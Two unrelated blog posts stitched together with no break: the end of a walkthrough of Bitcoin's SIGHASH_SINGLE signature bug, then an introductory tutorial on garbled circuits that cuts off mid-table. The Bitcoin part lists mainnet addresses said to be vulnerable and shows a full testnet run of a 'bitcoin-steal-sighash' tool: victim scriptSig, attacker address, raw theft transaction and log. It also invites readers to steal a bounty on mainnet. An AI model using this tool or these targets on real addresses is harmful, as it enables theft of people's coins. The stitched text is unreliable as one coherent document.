The attacker, using his private key and these inputs will create the following transaction:
Pay extra attention to the following details:
- The victim’s signature uses `SIGHASH_SINGLE`, that means it will have all inputs and the single matching output.

This is it, that is the actual bug and that’s how it can be exploited.
Yes, this bug was created by none other than the legendary Satoshi Nakamoto, go ahead and look at it yourself.
To do so, download the first version of Bitcoin’s source code (v0.1.0) from the Nakamoto Institute using this link.
Navigate to the `script.cpp` file; at line 818 you can find the `SignatureHash` function containing the following piece of code:
uint256 SignatureHash(CScript scriptCode, const CTransaction& txTo, unsigned int nIn, int nHashType)
{
    if (nIn >= txTo.vin.size())
    {
        printf("ERROR: SignatureHash() : nIn=%d out of range\n", nIn);
        return 1;
    }
    //...Some irrelevant code...
    else if ((nHashType & 0x1f) == SIGHASH_SINGLE)
    {
        unsigned int nOut = nIn;  // the matching output has the same index as the input
        if (nOut >= txTmp.vout.size())
        {
            printf("ERROR: SignatureHash() : nOut=%d out of range\n", nOut);
            return 1;
        }
    }
    //...Some irrelevant code...
}
As you can see, if the expression `nHashType & 0x1f` is equal to `SIGHASH_SINGLE` then the given input we are processing contains a signature with a sighash of type `SIGHASH_SINGLE`, so we look for the matching output and, if it doesn’t exist, we return the value `1` as an error code.
Next, the `SignatureHash` function is called from the `CheckSig` function (also in `script.cpp`, at line 881):
bool CheckSig(vector<unsigned char> vchSig, vector<unsigned char> vchPubKey, CScript scriptCode,
const CTransaction& txTo, unsigned int nIn, int nHashType)
{
// ...Some irrelevant code...
if (key.Verify(SignatureHash(scriptCode, txTo, nIn, nHashType), vchSig))
return true;
return false;
}
So, as part of the signature checking, the code calls the `SignatureHash` function and passes its output value directly to the `key.Verify` function without checking for the error code.
Because of this bug, the consensus of Bitcoin allows the signature of an input signed with `SIGHASH_SINGLE` (and no matching output) to be an ECDSA signature, with the private key, on the 256-bit value of 1.
To prevent users from accidentally triggering this bug, thereby publishing a signature on the hash value of “1”, the first fix was to make Bitcoin Core’s code prevent the user from signing such transactions, as written in the code here.
Taproot addresses, introduced in BIP-341 as part of the taproot upgrade, can’t create signatures with SIGHASH_SINGLE
without a matching output as this will invalidate such transactions.
I’ve written a tool called bitcoin-scan-sighash
which can connect to a local instance of a bitcoin-core node and scan the blockchain for such instances, you can check the repo here.
Using this tool I have compiled a list of numerous addresses that are vulnerable to the bug.
112jWgS2NYh6bwn2BWzNcPgELXxLxftx31
112RCi89FwLb64LePtxCHB86jY4BBAhLiP
1134V46popKAN2QLh1jDMCKPA6fjRnHTAP
1135zjYCkCGJUnuVG7yZcSFuLofcM5g2T
113VrEwZ7L77yFHD2yoKR8qZFr5Xuq8Khs
114cLg5Gc3hkkWuMN5B55YVLzPxS49VMvc
12S88cuMiUA7JdGsHTbKsXezUFzE2nNjFt
15iwPhxErFDyQTJew81ok9hCbQNhyWuXq1
19gVuEdDZ9XfmRSjLeAnywJ1zJoGig7qxq
19MxhZPumMt9ntfszzCTPmWNQeh6j6QqP2
1BqtnfhJS75AXKuDUAJ22XxU2QHNnENAcH
1CeBmgAuBj8WVhwpEVqPPMyV36uHZRfevy
1CgCMLupoVAnxFJwHTYTKrrRD3uoi3r1ag
1cSSVdjkGRJJRdsFH3mfmDEQHGpyz8jka
1Cy7gqTPMKDYpVS55MX7qemJBCE7tYbQY
1EaVdukMkbwrmsndGgwoTw4jR8im9TGhZ7
1EPPr3UQf6YMhEtejpjNUK6bVZ5HHLXjZ5
1FFtUDpR2CYZDc9TxzNpbNP1U6cXQ9Lq5c
1FjHqLzpeoMtaYa8MpbiYgbWihNGFocQno
1FoELHXby4WYTVXxCcXf8nrnz3VvNUG2EG
1fVuHc1ho7HhU9t8gk5xDDQzoiaEKShPs
1Hh9Uur2QuCLBT7RQxPkSGrYPb6Vbd7iAs
1JEM3niCozNRksJf3iYmBS99Yr1xUGc3KF
1KxmSmcMTmPvU1qSLYpJLrqnSzBoQ53NXN
1L5G9BRZ2o6HsKkMBJcUzg6nK1CgPjmgsz
1L5vVsCYa5cC4xttt2WnbT6UtkjrxwyskV
1YLtj6tygZh35AUKTqvxHedpydQbc1MaP
Notice that this tool also outputs the exact txid
and vout
in which the scriptSig
contains a SIGHASH_SINGLE
(or the SIGHASH_SINGLE | SIGHASH_ANYONECANPAY
variant).
So, it would be nice if we could put our knowledge to the test. In theory, if any of these addresses had a positive balance, we could have stolen their coins using our knowledge. Since they are emptied (are they?), we can try doing something else: sending a small amount of coins to such a vulnerable address and then “stealing” the coins sent there.
In order to do so, I’ve written another tool called bitcoin-steal-sighash
available here.
Let’s give an example of how we can use it.
Let’s say we have an address that is vulnerable to the SIGHASH_SINGLE
bug, that means we have some scriptSig
of some input within some transaction on which the owner of this address has signed “1”.
To save you the effort, I have created such a vulnerable address on the testnet of Bitcoin.
The address is mhHZmAp9ZAD2GuFqvg9ekQk9WwGX5iQGxt
and the vulnerable scriptSig
is:
4730440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a032102773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70f
So feel free to use it! In fact, let’s use it now.
Now, before running the tool (on testnet) you have to run a testnet node, that means you’ll have to modify your node’s configuration so that it will connect to the testnet, typically all it takes is to add the testnet=1
line inside your node’s configuration file or run your node with the -testnet
flag.
This is done on purpose to make it a little bit harder for you to run this on mainnet so you won’t accidentally lose your precious coins. Please don’t run this on mainnet unless you know what you’re doing!
To use it we’ll have to specify the following:
- The attacker’s address (using the `--attacker-address` flag), this is our address (since we’re the attackers!), stolen funds will be sent to this address. Notice that to employ this attack you’ll have to own some coins in this address (since we need some initial utxo to spend). You can use any Bitcoin-testnet faucet, I used this one.
- The `txid` (using the `--steal-txid` flag) and the `vout` (using the `--steal-vout` flag).
- The vulnerable `scriptSig` which contains the signature on “1” signed by the victim.

Using these inputs we can run our tool:
> bitcoin-steal-sighash \
--attacker-address mp4TunkzwEbpmRQfz6tRaFAcQYmBoFgQKP \
--steal-txid 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb \
--steal-vout 1 \
--vuln-script 4730440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a032102773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70f
[00:00:00.000] (7fba1c3c57c0) INFO Using .cookie auth with path: /home/matan/.bitcoin/testnet3/.cookie
[00:00:00.000] (7fba1c3c57c0) INFO Using url: http://127.0.0.1:18332
[00:00:00.001] (7fba1c3c57c0) INFO Spending utxo: txid: 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb, vout: 0
[00:00:00.008] (7fba1c3c57c0) INFO steal_tx: Transaction { version: 2, lock_time: 0, input: [TxIn { previous_output: OutPoint { txid: 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb, vout: 0 }, script_sig: Script(OP_PUSHBYTES_71 304402203a52f4e75e07f1745a99c52a6cab35efebf3b6748ddb29a580e5c6f09c8db0b10220418b2c9b752b7617fb3bb255842e5dc4baa8ff6595ca66b8a118e2a0091d125a03 OP_PUSHBYTES_33 02e9ebcfe1ada8a3ebf9c9978de06b8290a568e78c19411c261909890006b1273c), sequence: 4294967295, witness: [] }, TxIn { previous_output: OutPoint { txid: 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb, vout: 1 }, script_sig: Script(OP_PUSHBYTES_71 30440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a03 OP_PUSHBYTES_33 02773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70f), sequence: 4294967295, witness: [] }], output: [TxOut { value: 365921, script_pubkey: Script(OP_DUP OP_HASH160 OP_PUSHBYTES_20 5db69f9669402ac82b24302665d7a5e72e62fbfc OP_EQUALVERIFY OP_CHECKSIG) }] }
[00:00:00.008] (7fba1c3c57c0) INFO steal_tx raw: 0200000002dbaa32669feb164f80c94aaddc72ccf11d5fe43d9c86f9159ced22ecb8780941000000006a47304402203a52f4e75e07f1745a99c52a6cab35efebf3b6748ddb29a580e5c6f09c8db0b10220418b2c9b752b7617fb3bb255842e5dc4baa8ff6595ca66b8a118e2a0091d125a032102e9ebcfe1ada8a3ebf9c9978de06b8290a568e78c19411c261909890006b1273cffffffffdbaa32669feb164f80c94aaddc72ccf11d5fe43d9c86f9159ced22ecb8780941010000006a4730440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a032102773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70fffffffff0161950500000000001976a9145db69f9669402ac82b24302665d7a5e72e62fbfc88ac00000000
[00:00:00.010] (7fba1c3c57c0) INFO https://blockstream.info/testnet/tx/195f980f04e81444aa37aaa9bb6bdf40295776ba5fa36e96ed28da6f5b55dd7d?input:0&expand
[00:00:00.010] (7fba1c3c57c0) INFO https://blockstream.info/testnet/address/mp4TunkzwEbpmRQfz6tRaFAcQYmBoFgQKP
[00:00:00.010] (7fba1c3c57c0) INFO Finished, leaving!
You’ll probably have to send some testnet coins to the vulnerable address first, and then, using the sent coins, you can steal them back! When our tool finishes its execution successfully it prints links to Blockstream’s explorer; you can check the links in the example to see what a successful execution looks like.
I hope you’ve learnt something new about Bitcoin and how its different parts come together. Try to imagine how difficult it is to design and maintain systems which rely on distributed consensus, and how one tiny bug has remained with us for over 13 years.
In one address on the mainnet I’ve also hidden a (very) small bounty that you can steal if you follow everything here correctly. So go ahead and good luck! The winner is kindly requested to get in touch with me on Twitter or Telegram. If you have any questions feel free to ask on Twitter / Telegram too.
In this article I’d like to give some introduction to Garbled Circuits. If you have reached this article and are wondering what a Garbled Circuit is, you are probably at least somewhat familiar with Multiparty-Computation (MPC) and cryptography.
To make things clear, let’s say that MPC is a sub-domain of cryptography that deals with methods which allow a set of mistrusting parties, each holding its own input, to compute a function of those inputs such that none of the parties learn anything about the (private) input of the other parties, besides what can be trivially inferred about it from the output.
For example, consider Yao’s Millionaires Problem, in which two millionaires would like to know which of them is richer without disclosing their fortunes.
Each millionaire’s input would be the value of their fortune, and the function to be evaluated (which returns either `True` or `False`) is whether the first input is bigger than the second.
Now that the setting is clearer, I can say that Garbled Circuits is a protocol allowing two parties $\mathcal{P}_A,\mathcal{P}_B$, with inputs $i_A,i_B$ respectively, to compute a function $f$ of their inputs such that each party will learn only $f(i_A,i_B)$. How awesome is that?
In this article I’d like to give some sense of how Garbled Circuits are built and how the magic works. I’ve found this topic tends to be cryptic to some friends and colleagues, and I thought creating this document would give some intuition about the building blocks of GCs. This article does not intend to be rigorous and I’ll not be proving any security property of GCs. I see learning crypto topics as a multi-tiered procedure: first gaining a general sense of the cryptographic entity, and only later giving more explicit, rigorous and formal definitions and proofs about it, makes complex topics easier to grasp. I will also not consider extensions of GCs to more than two parties, although such extensions do exist. The interested reader can refer to Oded Goldreich’s article to learn more about it. Notice that Oded is using the term “Scrambled Circuit” instead of “Garbled Circuit”.
In this article we assume the Semi-Honest model of security. By making this assumption we disregard any scenario in which one of the parties deviates from an agreed-upon protocol to gain extra information. In other words, we assume the parties are honest-but-curious: they follow the protocol precisely as stated but may be interested in gaining extra information from the messages they receive along the way. We will explain (without too much formality involved) why such honest-but-curious parties cannot gain any information except for the output of the function being computed. We will not approach the more complex problem of building a GC protocol in the Malicious-Adversary model, where parties may deviate from the prescribed protocol arbitrarily.
The collaborating parties $\mathcal{P}_A, \mathcal{P}_B$ hold inputs $A,B$ respectively and wish to jointly compute a function $f(A,B)$. The inputs $A,B$ are each represented as a vector of bits. When building a Garbled Circuit for the function $f$, the first thing one does is represent $f$ as a boolean circuit, composed of boolean gates. For simplicity we will deal with two types of gates:
It is a well-known result that any boolean function can be represented as a boolean circuit composed only of AND gates and XOR gates. Therefore, if we can show that the XOR and AND gates can be computed by two parties such that input privacy is preserved, and that these gates can be securely composed, we achieve our desired goal.
We will not discuss how a function can be represented as a boolean circuit, as this is itself an active research field. At this point we will simply assume that such a representation exists for our given function.
To make the construction more concrete and approachable we will discuss a specific instance of the problem for a rather simple function $f$. Later, we give a generalized algorithm for any function. The function we will deal with in our construction takes two numbers of two binary digits each and tells whether they are the binary negation of each other; in other words, whether the first input is equal to the number obtained by taking the second input and flipping all the bits representing it. For example, $f(2,1)=1$ because 2’s binary representation is 10 and 1’s binary representation is 01, and since 10 is obtained by flipping all the bits in 01, we get $f(2,1)=1$. To be precise, the inputs of the parties will be $A=(a_0,a_1)$ and $B=(b_0,b_1)$ where $a_0,a_1,b_0,b_1$ are bits and $A,B$ are the input numbers with the binary representations $a_1a_0$ and $b_1b_0$ respectively. The single bit of output of the function is $C=(c_0)$. For example, if the input of party $\mathcal{P}_A$ is the number $2$, it will be represented as $A=(0,1)$, and if the input of party $\mathcal{P}_B$ is the number $1$, then the output of the function will be $C=(1)$.
The boolean circuit for this function is:
We have annotated each wire with a number which we will use later in our building.
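Before any garbling, it may help to see the plain circuit in code. Below is a small Python sketch; the wire numbering follows the annotation above, while the exact assignment of input bits to wires 1-4 is my reading of the circuit (it matches the gate wiring used later in the post):

```python
def eval_circuit(a0, a1, b0, b1):
    """Evaluate f on the plain (ungarbled) circuit.

    Wires 1-4 carry the input bits (P_A feeds wires 1 and 3,
    P_B feeds wires 2 and 4); wires 5-7 carry the gate outputs.
    """
    w1, w2, w3, w4 = a0, b0, a1, b1
    w5 = w3 ^ w4          # XOR gate on the high bits
    w6 = w1 ^ w2          # XOR gate on the low bits
    w7 = w5 & w6          # AND gate: 1 iff both bit pairs differ
    return w7             # the output bit c0

# f(2, 1): A = (a0, a1) = (0, 1), B = (b0, b1) = (1, 0)
print(eval_circuit(0, 1, 1, 0))  # 1, since 10 is the bitwise negation of 01
```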
In this subsection we’ll try to build a GC for our function $f(A,B)$, taking as input two vectors of two bits each, representing two numbers, and giving as output a “vector” of a single bit. In the beginning we have two parties who have the boolean circuit for $f$. Now, let’s think: if we were trying to solve this problem ourselves, what would be the first thing we would try to tackle? Well, since none of the parties may learn anything besides the output of the computed function, party $\mathcal{P}_A$ can’t simply send its input $A$ to party $\mathcal{P}_B$. If it did, party $\mathcal{P}_B$ could compute $f(A,B)$ and send it to $\mathcal{P}_A$, but by doing so $\mathcal{P}_B$ would also learn $A$, the input of $\mathcal{P}_A$, which violates our privacy requirements. Therefore, the information $\mathcal{P}_A$ sends to $\mathcal{P}_B$ shall not disclose its input but should still allow $\mathcal{P}_B$ to evaluate the function. So, the approach we shall take is a little bit different: $\mathcal{P}_A$ will send a garbled version of the circuit to $\mathcal{P}_B$ and some “instructions” for $\mathcal{P}_B$ about how to “translate” its input ($B$) into the garbled circuit. Next, $\mathcal{P}_B$ will evaluate the garbled circuit, which will yield a garbled output, and send this output to $\mathcal{P}_A$, who will ungarble it into the correct output and send it to $\mathcal{P}_B$. Garbling the circuit, done by $\mathcal{P}_A$, will require:
In the following subsections we will explain how these can be done.
Let’s consider a logical gate with two input wires $(w_a,w_b)$ and a single output wire $(w_c)$. When the input wires are set to specific values, the output wire will hold the value obtained by applying the gate’s logical function to them. The functionality of the logical gate can be described using a truth table, a table which gives the value of the output wire $(w_c)$ for each of the four possible combinations of the input wires $w_a, w_b$. For example, the truth table of the logical-AND gate we have in our boolean circuit is the following:
$w_a$ | $w_b$ | $w_c$ |
---|---|---|
0 | 0 | 0 |
0 | 1 | 0 |
1 | 0 | 0 |
1 | 1 | 1 |
To make things clear, the first line in the table, for example, means that if the input wires $w_a$ and $w_b$ take the values of 0 and 0, then the output wire $w_c$ will take the value of 0 as well, which is the logical-AND of the two inputs. While it’s a common practice, it’s important to recall that the value of 0 represents a logical “False” and the value of 1 represents a logical “True”.
The truth table of a logical-XOR gate is the following:
$w_a$ | $w_b$ | $w_c$ |
---|---|---|
0 | 0 | 0 |
0 | 1 | 1 |
1 | 0 | 1 |
1 | 1 | 0 |
We will garble the truth table by assigning two encryption keys to each wire in the circuit. For example, our circuit has seven different wires, so we will generate for each wire $i$ two keys $K_i^0$ and $K_i^1$. Intuitively, we need two keys to represent the two possible states of the wire, which carries either the value “0” or the value “1”. The keys belong to a symmetric encryption scheme, so each key is used both for encryption and decryption. Let’s zoom in on a specific gate in the circuit, for instance our logical-XOR gate with input wires 1 and 2 and output wire 6. Wire 1 will have two keys $K_1^0$ and $K_1^1$, wire 2 will have two keys $K_2^0$ and $K_2^1$, and output wire 6 will have two keys $K_6^0$ and $K_6^1$. Next, we can garble the truth table in the following way. For each line in the original (ungarbled) truth table, taking input values $x$ on wire 1 and $y$ on wire 2 and mapping them into output $z$ on wire 6 ($x,y,z$ are all one bit wide), we create a line in the garbled truth table mapping $K_1^{x}$ and $K_2^{y}$ to $K_6^{z}$. For example, in the second line of our logical-XOR gate’s truth table we had inputs $x=0$ and $y=1$ mapped to the output $z=1$ (because 0 XOR 1 = 1), so in the garbled table we will have $K_1^0$, $K_2^1$ map to $K_6^1$. The full garbled table of the logical-XOR will be:
Wire 1 | Wire 2 | Wire 6 |
---|---|---|
$K_1^0$ | $K_2^0$ | $K_6^0$ |
$K_1^0$ | $K_2^1$ | $K_6^1$ |
$K_1^1$ | $K_2^0$ | $K_6^1$ |
$K_1^1$ | $K_2^1$ | $K_6^0$ |
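As a toy Python sketch of this first garbling attempt (my own illustration; the `secrets` module supplies the random keys):

```python
import secrets

def fresh_keys():
    """Two random 128-bit keys per wire: one garbles 0, the other garbles 1."""
    return (secrets.token_bytes(16), secrets.token_bytes(16))

# K[i][v] is the key garbling value v on wire i (only wires 1, 2, 6 shown).
K = {i: fresh_keys() for i in (1, 2, 6)}

# First-attempt garbled XOR table: each truth-table line becomes a row
# mapping the pair of input-wire keys directly to the output-wire key.
garbled_xor = [((K[1][x], K[2][y]), K[6][x ^ y])
               for x in (0, 1) for y in (0, 1)]
```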
The garbling of the input is done so that for each of $\mathcal{P}_A$’s input wires, party $\mathcal{P}_A$ will send the key representing the garbling of its input bit. For example, in our XOR gate with input wires 1 and 2 and output wire 6, we know the value of wire 1 is part of the input of party $\mathcal{P}_A$. Now, if the input of party $\mathcal{P}_A$ for this bit is $0$ then its garbled value will be $K_1^0$, and if the input is $1$ then it will be garbled to $K_1^1$, where $K_1^0,K_1^1$ are the two keys associated with wire $1$. Notice that party $\mathcal{P}_B$, who receives the garbled input, can’t tell whether it represents the garbling of $0$ or $1$, because both keys are just random numbers and $\mathcal{P}_A$ didn’t share with $\mathcal{P}_B$ the meaning of each key.
Now in order to compute the output of the gate, party $\mathcal{P}_A$ will send to $\mathcal{P}_B$:
Also notice that $\mathcal{P}_A$ must send both keys for each wire, since $\mathcal{P}_B$ can’t just tell $\mathcal{P}_A$ what its input bit is, as this would violate our privacy requirements.
As good as it may sound, things don’t end here, since at this point in order to evaluate the gate, $\mathcal{P}_B$ receives the garbling of $\mathcal{P}_A$’s input and the problem is that while $\mathcal{P}_B$ will be able to evaluate the gate, it will also be able to derive whether $\mathcal{P}_A$’s input to our XOR gate is $K_1^1$ or $K_1^0,$ thus inferring the value of the ungarbled input of $\mathcal{P}_A$.
This is possible since the ordering of the rows is such that in the first and second rows the ‘Wire 1’ column contains $K_1^0$ and in the third and fourth rows it contains $K_1^1$, so $\mathcal{P}_B$ can just compare the key it got with the values in these rows and ascertain the input of $\mathcal{P}_A$, which violates our privacy requirements!
So, one thing we have to do is mix the ordering of the rows randomly. After mixing the rows, the garbled table of our XOR gate looks like this to $\mathcal{P}_B$:
Wire 1 | Wire 2 | Wire 6 |
---|---|---|
$K_1^?$ | $K_2^?$ | $K_6^?$ |
$K_1^?$ | $K_2^¿$ | $K_6^¿$ |
$K_1^¿$ | $K_2^?$ | $K_6^¿$ |
$K_1^¿$ | $K_2^¿$ | $K_6^?$ |
For completeness, the garbled table of the AND gate (with input wires 5,6 and output 7) is:
Wire 5 | Wire 6 | Wire 7 |
---|---|---|
$K_5^?$ | $K_6^?$ | $K_7^?$ |
$K_5^?$ | $K_6^¿$ | $K_7^?$ |
$K_5^¿$ | $K_6^?$ | $K_7^?$ |
$K_5^¿$ | $K_6^¿$ | $K_7^¿$ |
We use the notation “?” and “¿” to denote that $\mathcal{P}_B$ simply doesn’t know the meaning of the value.
However, even if we mix the rows, $\mathcal{P}_B$ can still recover the whole input of party $\mathcal{P}_A$. One possible attack exploits the asymmetry in the AND gate’s output column (wire 7). Since this output column has three rows with the same value and one row with another value, by knowing the functionality of the AND gate we can tell that this last value represents a logical 1 (since only one combination of the inputs to a logical AND gate yields the output 1). After $\mathcal{P}_B$ derives the values of $K_7^1$ and $K_7^0$, it can also tell that the two keys of wires 5 and 6 that yield the output $K_7^1$ must be $K_5^1$ and $K_6^1$, and thus $\mathcal{P}_B$ can derive the values of $K_5^0,K_5^1,K_6^0,K_6^1$. At this point, going back to the XOR gate (with input wires $1,2$), $\mathcal{P}_B$ can tell, even without enumerating all the inputs, that if the XOR of the value it provided $(b_0)$ with the one $\mathcal{P}_A$ provided $(a_0)$ yields $K_6^1$ then $b_0$ and $a_0$ are different, and if it yields $K_6^0$ then they are equal; thus it can infer the value of $a_0$ and learn the input of $\mathcal{P}_A$.
The issue stems from the fact that $\mathcal{P}_B$ has been able to exploit some asymmetry at the output of the AND gate. Thus, we must have each output of the garbled circuit appear only once so $\mathcal{P}_B$ should not be able to exploit such asymmetries.
This time, just like in the previous attempt, $\mathcal{P}_A$ will assign two encryption keys to each wire in the circuit, and we will use the same notation as before.
However, this time, instead of sending a table with multiple columns for each gate, it will send only the output column of the truth table, where each output is encrypted with the two keys of its corresponding inputs. For example, the table for the XOR gate (with input wires $1,2$) will look like this (but don’t forget $\mathcal{P}_A$ also shuffles the rows before sending them):
Wire 6 |
---|
$E_{K_1^0}(E_{K_2^0}(K_6^0 || K_6^0))$ |
$E_{K_1^0}(E_{K_2^1}(K_6^1 || K_6^1))$ |
$E_{K_1^1}(E_{K_2^0}(K_6^1 || K_6^1))$ |
$E_{K_1^1}(E_{K_2^1}(K_6^0 || K_6^0))$ |
We denote by $x || y$ the concatenation of the strings $x,y$, and by $E_K(p)$ the encryption of $p$ with key $K$.
So each output is the double encryption (using the key of the first input wire and then the second input wire) of the concatenation of the output with itself. We’ll explain shortly why we concatenate the output with itself, but for now take it as given.
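As an illustration, the doubly encrypted table can be sketched in Python. The cipher E below is a toy XOR stream cipher derived from SHA-256, an assumption of mine chosen only to keep the sketch self-contained (conveniently, encryption and decryption are then the same operation); a real implementation would use a proper symmetric scheme.

```python
import hashlib
import secrets

def E(key: bytes, data: bytes) -> bytes:
    """Toy XOR stream cipher; for a fixed key, E is its own inverse.
    For illustration only, not a real encryption scheme."""
    stream, counter = b"", 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))

# Two 128-bit keys per wire; K[i][v] garbles the value v on wire i.
K = {i: (secrets.token_bytes(16), secrets.token_bytes(16)) for i in (1, 2, 6)}

# The XOR gate's garbled table: only the doubly encrypted output column,
# with the output key concatenated with itself so P_B can recognize success.
table = [E(K[1][x], E(K[2][y], K[6][x ^ y] + K[6][x ^ y]))
         for x in (0, 1) for y in (0, 1)]
```

Decrypting a row later means peeling the two layers in reverse order: first with the wire-1 key, then with the wire-2 key.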
And $\mathcal{P}_B$ views this table as:
Wire 6 |
---|
$E_{K_1^?}(E_{K_2^?}(K_6^? || K_6^?))$ |
$E_{K_1^?}(E_{K_2^¿}(K_6^¿ || K_6^¿))$ |
$E_{K_1^¿}(E_{K_2^?}(K_6^¿ || K_6^¿))$ |
$E_{K_1^¿}(E_{K_2^¿}(K_6^? || K_6^?))$ |
So this time, just like in the previous attempt, $\mathcal{P}_A$ will send:
Now, for our XOR gate (with input wires 1 and 2), $\mathcal{P}_B$ will take $K_1^?$ (just like before, we use “?” to imply that $\mathcal{P}_B$ doesn’t know whether it’s the garbling of the value “1” or “0”) and its own garbled input (let’s assume it’s $K_2^0$, without loss of generality). Next, it will try to double-decrypt all the entries in the garbled table with the input encryption keys until the decryption successfully results in some value written twice ($K_6^? || K_6^?$ or $K_6^¿ || K_6^¿$); in this case it knows that the resulting output is correct. So, we write the output value twice as a way to verify that a decryption is successful, so $\mathcal{P}_B$ can tell that the output is correct. There are other ways of doing this kind of verification that the decryption succeeded; see Authenticated Encryption for further detail.
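The trial-decryption loop that $\mathcal{P}_B$ runs can be sketched like this (again with a toy SHA-256-based XOR cipher standing in for a real symmetric scheme, an assumption of this sketch):

```python
import hashlib
import random
import secrets

def E(key: bytes, data: bytes) -> bytes:
    """Toy XOR stream cipher; for a fixed key, E is its own inverse."""
    stream, counter = b"", 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))

# Keys for wires 1, 2 (inputs) and 6 (output); index [v] garbles bit v.
K = {i: (secrets.token_bytes(16), secrets.token_bytes(16)) for i in (1, 2, 6)}
rows = [E(K[1][x], E(K[2][y], K[6][x ^ y] * 2)) for x in (0, 1) for y in (0, 1)]
random.shuffle(rows)  # P_A shuffles the rows before sending the table

def evaluate_gate(rows, k1, k2):
    """P_B tries every row; a doubled 16-byte value marks the correct one."""
    for row in rows:
        plain = E(k2, E(k1, row))          # peel the two encryption layers
        if plain[:16] == plain[16:]:
            return plain[:16]              # the garbled output key K_6^?
    raise ValueError("no row decrypted correctly")

# Say P_A's garbled input is K_1^1 and P_B's is K_2^0:
out = evaluate_gate(rows, K[1][1], K[2][0])
assert out == K[6][1]  # 1 XOR 0 = 1, though P_B can't tell which bit this is
```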
For example, if $\mathcal{P}_A$’s garbled input is $K_1^1$ and $\mathcal{P}_B$’s garbled input is $K_2^0$ then $\mathcal{P}_B$ will try to decrypt each entry in the garbled table as follows:
The only issue we have arises from the fact that $\mathcal{P}_B$ receives the garblings of both of its possible inputs for each wire that its input feeds, so it can enumerate all possible combinations of its inputs and evaluate the circuit for each such combination. We know that for all input combinations, except for one, the output will be the same (the value of $K_7^0$) and only for one of the combinations the output will be unique ($K_7^1$), this is because only for one possible input of $\mathcal{P}_B$, which is the negation of the input of $\mathcal{P}_A$, the circuit will output the value of 1. By taking the input that was fed into the circuit to yield the unique value of $K_7^1$, ungarbling it and flipping the bits $\mathcal{P}_B$ can reveal the whole input of $\mathcal{P}_A$, which violates our privacy requirements.
We understand that $\mathcal{P}_B$ can’t receive both keys for each wire that its input feeds, because then it would be able to learn $\mathcal{P}_A$’s input. However, without those keys it must disclose its input to $\mathcal{P}_A$! How can we solve this? While it may seem like a dead end, cryptographers have luckily come up with a great solution, known as “Oblivious Transfer”.
The problem oblivious transfer (OT) is trying to solve is the following:
There are two parties $\mathcal{P}_A$ and $\mathcal{P}_B$. Party $\mathcal{P}_A$ is holding two values $x_0,x_1$. Party $\mathcal{P}_B$ is holding a bit $b$. The parties want $\mathcal{P}_B$ to learn $x_b$ without $\mathcal{P}_A$ learning the value of $b$ (i.e. which of the two values was transferred to $\mathcal{P}_B$) and without $\mathcal{P}_B$ learning anything about the other value $x_{1-b}$.
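Viewed purely as a functionality (not as a construction), OT can be pictured as a trusted-third-party stub; the point of a real OT protocol is to achieve exactly this behaviour without any trusted party:

```python
def ideal_ot(x0, x1, b):
    """Ideal OT functionality: the receiver learns x_b and nothing about the
    other value, while the sender learns nothing about the bit b."""
    return x1 if b else x0

# P_A holds the two wire keys, P_B holds its secret input bit:
received = ideal_ot("key-garbling-0", "key-garbling-1", 1)
```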
While it isn’t very complex, we will not go through the construction of Oblivious-Transfer in this post (please let me know if you find this topic interesting, I may create another post about it later). This post is complex enough :)
This attempt will be exactly like the second attempt, but we will leverage OT to solve our last problem. The only difference from the previous attempt is that now $\mathcal{P}_B$ will learn only one of $K_2^0$ and $K_2^1$, and only one of $K_4^0$ and $K_4^1$, according to its input. This will be done using Oblivious-Transfer, and it prevents the attack suggested in the previous attempt since $\mathcal{P}_B$ now holds only one key per input wire it feeds.
To recap our amazing result, this subsection gives the full details of our garbled circuit protocol.
There are two parties $\mathcal{P}_A$ and $\mathcal{P}_B$ with bit-vector inputs ${\bf A} = (A_1,…,A_n)$ and ${\bf B}=(B_1,…,B_n)$ respectively. The function $f$ is represented as a boolean circuit, known to both parties, with wires $w_1,w_2,…,w_k$ where $k$ is the total number of wires in the circuit. Wires $w_1,…,w_n$ will be the $n$ wires in the circuit that take the input of $\mathcal{P}_A$.
The next $n$ wires, $w_{n+1},…,w_{2n}$, will take the input of $\mathcal{P}_B$. The rest of the wires take the output of one of the gates in the circuit. The goal of both parties is to evaluate $f$ together without disclosing any information about their inputs.
The evaluation works in three phases:
Party $\mathcal{P}_A$ will garble the circuit and its input. Each wire $w_j$ in the circuit will be assigned two encryption keys $K_j^0$ and $K_j^1$, which represent the garbling of the values 0 and 1 going through the wire, respectively. Next, consider each gate $G$ in the circuit with two input wires $w_a, w_b$ and one output wire $w_c$ with the following truth table:
$w_a$ | $w_b$ | $w_c$ |
---|---|---|
0 | 0 | $g_{0,0}$ |
0 | 1 | $g_{0,1}$ |
1 | 0 | $g_{1,0}$ |
1 | 1 | $g_{1,1}$ |
Here $g_{i,j}$ is the output of the gate $G$ on inputs $w_a=i$ and $w_b=j$. Then the garbling of gate $G$ with the truth table above is:
$w_c$ |
---|
$E_{K_a^0}(E_{K_b^0}(K_c^{g_{0,0}} || K_c^{g_{0,0}}))$ |
